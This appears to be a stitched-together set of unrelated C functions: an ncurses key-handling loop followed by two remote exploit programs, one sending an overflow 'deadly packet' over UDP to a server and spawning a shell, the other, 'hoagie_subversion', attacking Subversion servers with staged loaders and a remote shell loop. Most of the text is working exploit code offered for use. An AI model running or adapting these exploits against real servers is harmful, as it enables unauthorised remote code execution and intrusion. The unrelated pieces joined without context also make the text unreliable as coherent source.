t_bool catch_key() { int i; int key; keypad(stdscr, TRUE); i = -1; while (i == -1 || (key = getch()) != 'q') { i = 0; if (key == '\t') { g_ctrl.focus = (g_ctrl.focus + 1) % 2; wbkgd(g_ctrl.menu[g_ctrl.focus].win, COLOR_PAIR(P_FONT)); wbkgd(g_ctrl.menu[(g_ctrl.focus + 1) % 2].win, COLOR_PAIR(P_NFOC)); } while (g_movetab[i].c != 0 && g_movetab[i].c != key) i++; if (g_movetab[i].fct != NULL) g_movetab[i].fct(&(g_ctrl.menu[g_ctrl.focus])); else if (g_movetab[i].sh != NULL) exec_sh(g_movetab[i].sh, &(g_ctrl.menu[g_ctrl.focus])); refresh_win(g_ctrl.focus); } return (TRUE); }
int main(int argc, char *argv[]) { unsigned char buffrecv[BUFFSZ], buffsend[sizeof(BOF1) + 64], challenge[16], bug, *bofstr, *stri, *strf; struct sockaddr_in peer; int sd, err, rlen, bufflen, proto; unsigned long offset; setbuf(stdout, NULL); if(argc < 2) { printf("\nUsage: %s <host> <port>\n\n", argv[0], PORT); exit(1); } printf("OK team, follow my command.\n"); srand(time(NULL)); bofstr=BOF1; peer.sin_addr.s_addr = resolv(argv[1]); peer.sin_port = htons(atoi(argv[2])); // offset=strtoul(argv[3],NULL,16); peer.sin_family = AF_INET; rlen = sizeof(peer); offset=0x0804AE93; // call eax printf("Using offset 0x%08x...\n",offset); sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if(sd < 0) std_err(); /* GET INFORMATIONS */ err = sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, rlen); if(err < 0) std_err(); err = timeout2(sd); if(err < 0) { fputs("\nError: socket timeout\n", stdout); exit(1); } err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen); if(err < 0) std_err(); buffrecv[err] = 0x00; proto = getproto(buffrecv); showinfostring(buffrecv, err); /* GET CHALLENGE NUMBER */ err = sendto(sd, GETCH, sizeof(GETCH) - 1, 0, (struct sockaddr *)&peer, rlen); if(err < 0) std_err(); err = timeout2(sd); if(err < 0) { fputs("\nError: socket timeout\n", stdout); exit(1); } err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen); if(err < 0) std_err(); buffrecv[err] = 0x00; stri = strchr(buffrecv, 0x20); if(!stri) stri = buffrecv; strf = strchr(stri + 1, 0x20); if(!strf) strf = buffrecv + err; *strf = 0x00; strncpy(challenge, stri, 16); printf("Challenge: %s\n", challenge); bufflen = snprintf(buffsend, sizeof(BOF1) + 64, bofstr, proto, challenge, (long)(rand() << 1) + (rand() & 0xf), /* 31bit */ (long)(rand() << 1) + (rand() & 0xf), (long)(rand() << 1) + (rand() & 0xf), (long)(rand() << 1) + (rand() & 0xf), offset&0xFF,(offset>>8)&0xFF,(offset>>16)&0xFF,(offset>>24)&0xFF, offset&0xFF,(offset>>8)&0xFF,(offset>>16)&0xFF,(offset>>24)&0xFF, offset&0xFF,(offset>>8)&0xFF,(offset>>16)&0xFF,(offset>>24)&0xFF); if(bufflen < 0) { fputs("\nError: cannot allocate buffer in memory\n", stdout); exit(1); } printf("Sending deadly packet ... stand by\n"); err = sendto(sd, buffsend, bufflen, 0, (struct sockaddr *)&peer, rlen); if(err < 0) std_err(); err = timeout2(sd); if(err < 0) { fputs("\nResult: The remote server IS vulnerable!!!\n", stdout); exec_sh(connect_sh(argv[1])); return(0); } err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen); if(err < 0) std_err(); buffrecv[err] = 0x00; printf("Connect: %s\n", buffrecv + 5); close(sd); fputs("\nResult: The server doesn't seems to be vulnerable\n\n", stdout); return(0); }
int main(int argc, char **argv) { int sock, port; size_t size; char cmd[1000], reply[1000], buffer[1000]; char svdcmdline[1000]; char host[1000], repos[1000], *ptr, *caddr; unsigned long addr; struct sockaddr_in sin; struct hostent *he; enum protocol proto; /*sock=open("output",O_CREAT|O_TRUNC|O_RDWR,0666); write(sock,stage1loader,strlen(stage1loader)); close(sock); return 0;*/ printf("hoagie_subversion - remote exploit against subversion servers\n" "by [email protected]\n\n"); if(argc!=3) { printf("Usage: %s serverurl offset\n\n",argv[0]); printf("Examples:\n" " %s svn://localhost/repository 0x41414141\n" " %s http://victim.com:6666/svn 0x40414336\n\n",argv[0],argv[0]); printf("The offset is an alphanumeric address (or UTF-8 to be\n" "more precise) of a pop instruction, followed by a ret.\n" "Brute force when in doubt.\n\n"); printf("When exploiting against an svn://-url, you can supply a\n" "binary offset too.\n\n"); exit(1); } // parse the URI snprintf(svdcmdline,sizeof(svdcmdline),"%s",argv[1]); if(parse_uri(argv[1],&proto,host,&port,repos)<0) { printf("URI parse error\n"); exit(1); } printf("parse_uri result:\n" "Protocol: %d\n" "Host: %s\n" "Port: %d\n" "Repository: %s\n\n",proto,host,port,repos); addr=strtoul(argv[2],NULL,16); caddr=(char *)&addr; printf("Using offset 0x%02x%02x%02x%02x\n",caddr[3],caddr[2],caddr[1],caddr[0]); sock=socket(AF_INET,SOCK_STREAM,0); if(sock<0) { perror("socket"); return -1; } he=gethostbyname(host); if(he==NULL) { herror("gethostbyname"); return -1; } sin.sin_family=AF_INET; sin.sin_port=htons(port); memcpy(&sin.sin_addr.s_addr,he->h_addr,sizeof(he->h_addr)); if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))<0) { perror("connect"); return -1; } if(proto==SVN) { size=read(sock,reply,sizeof(reply)); reply[size]=0; printf("Server said: %s\n",reply); snprintf(cmd,sizeof(cmd),"( 2 ( edit-pipeline ) %d:%s ) ",strlen(svdcmdline),svdcmdline); write(sock,cmd,strlen(cmd)); size=read(sock,reply,sizeof(reply)); reply[size]=0; printf("Server said: %s\n",reply); strcpy(cmd,"( ANONYMOUS ( 0: ) ) "); write(sock,cmd,strlen(cmd)); size=read(sock,reply,sizeof(reply)); reply[size]=0; printf("Server said: %s\n",reply); snprintf(cmd,sizeof(cmd),"( get-dated-rev ( %d:%s%c%c%c%c ) ) ",strlen(stage1loader)+4,stage1loader, caddr[0],caddr[1],caddr[2],caddr[3]); write(sock,cmd,strlen(cmd)); size=read(sock,reply,sizeof(reply)); reply[size]=0; printf("Server said: %s\n",reply); } else if(proto==HTTP) { // preparing the request... snprintf(buffer,sizeof(buffer),xmlreqfmt,stage1loader, caddr[0],caddr[1],caddr[2],caddr[3]); size=strlen(buffer); snprintf(cmd,sizeof(cmd),requestfmt,repos,host,size,buffer); // now sending the request, immediately followed by the 2nd stage loader printf("Sending:\n%s",cmd); write(sock,cmd,strlen(cmd)); sleep(1); write(sock,stage2loader,stage2loaderlen); } // SHELL LOOP printf("Entering shell loop...\n"); exec_sh(sock); /*sleep(1); close(sock); printf("\nConnecting to the shell...\n"); exec_sh(connect_sh()); */ return 0; }